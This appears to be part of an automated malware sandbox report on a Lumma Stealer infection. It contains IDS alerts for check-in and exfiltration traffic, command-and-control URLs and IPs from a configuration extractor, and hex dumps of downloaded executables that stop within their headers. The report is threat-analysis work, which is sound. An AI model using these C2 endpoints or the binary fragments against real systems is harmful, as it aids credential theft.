Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50259 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50266 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50274 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50274 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50277 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50275 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50275 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50261 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50261 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50321 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50318 -> 104.21.33.116:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://property-imper.sbs:443/api
Source: Malware configuration extractor IPs: 185.215.113.43
Source: Malware configuration extractor URLs: home.fvtekk5pn.top
Source: Malware configuration extractor URLs: CgPhome.fvtekk5pn.top
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 13:24:11 GMTContent-Type: application/octet-streamContent-Length: 513536Last-Modified: Sun, 24 Nov 2024 12:22:56 GMTConnection: keep-aliveETag: "67431aa0-7d600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 b7 da 41 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 68 02 00 00 9c 00 00 00 00 00 00 90 a8 01 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 08 00 00 06 00 00 00 00 00 00 03 00 40 c3 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 e2 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 3c 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 87 02 00 c0 00 00 00 00 00 00 00 00 00 00 00 c8 e3 02 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ba 66 02 00 00 10 00 00 00 68 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 72 00 00 00 80 02 00 00 74 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 20 00 00 00 00 03 00 00 10 00 00 00 e2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 08 00 00 00 00 30 03 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 14 00 00 00 40 03 00 00 16 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 63 6f 53 00 00 00 00 00 cc 04 00 00 60 03 00 00 cc 04 00 00 0a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 13:24:18 GMTContent-Type: application/octet-streamContent-Length: 4385280Last-Modified: Sun, 24 Nov 2024 12:19:04 GMTConnection: keep-aliveETag: "674319b8-42ea00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 80 c4 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 c4 00 00 04 00 00 61 6c 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 66 c4 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 65 c4 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 64 69 75 6a 70 63 69 00 40 1b 00 00 30 a9 00 00 38 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 64 79 70 71 71 78 72 00 10 00 00 00 70 c4 00 00 04 00 00 00 c4 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 c4 00 00 22 00 00 00 c8 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 13:24:30 GMTContent-Type: application/octet-streamContent-Length: 1860096Last-Modified: Sun, 24 Nov 2024 12:34:33 GMTConnection: keep-aliveETag: "67431d59-1c6200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 51 3c 3f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 c2 00 00 00 00 00 00 00 20 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 4a 00 00 04 00 00 af f8 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 80 05 00 70 00 00 00 00 70 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 05 00 00 10 00 00 00 62 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 70 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 05 00 00 02 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2a 00 00 90 05 00 00 02 00 00 00 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 67 63 62 7a 6f 68 75 00 d0 19 00 00 40 30 00 00 c2 19 00 00 78 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6d 79 72 61 68 75 73 00 10 00 00 00 10 4a 00 00 06 00 00 00 3a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 4a 00 00 22 00 00 00 40 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 13:24:39 GMTContent-Type: application/octet-streamContent-Length: 1801728Last-Modified: Sun, 24 Nov 2024 12:34:40 GMTConnection: keep-aliveETag: "67431d60-1b7e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 24 01 00 00 00 00 00 00 30 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 69 00 00 04 00 00 26 27 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 65 72 62 6a 71 71 76 00 e0 19 00 00 40 4f 00 00 e0 19 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 75 71 64 65 77 66 79 00 10 00 00 00 20 69 00 00 04 00 00 00 58 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 69 00 00 22 00 00 00 5c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 13:24:48 GMTContent-Type: application/octet-streamContent-Length: 921600Last-Modified: Sun, 24 Nov 2024 12:32:47 GMTConnection: keep-aliveETag: "67431cef-e1000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e7 1c 43 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 60 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 fe 95 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 3c a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3c a5 00 00 00 40 0d 00 00 a6 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 24 Nov 2024 13:24:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 13:24:55 GMTContent-Type: application/octet-streamContent-Length: 2814976Last-Modified: Sun, 24 Nov 2024 12:33:14 GMTConnection: keep-aliveETag: "67431d0a-2af400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 45 cc 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 63 6b 6e 6a 62 68 77 00 a0 2a 00 00 a0 00 00 00 94 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 61 7a 62 6a 6e 6c 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 ce 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 d2 2a 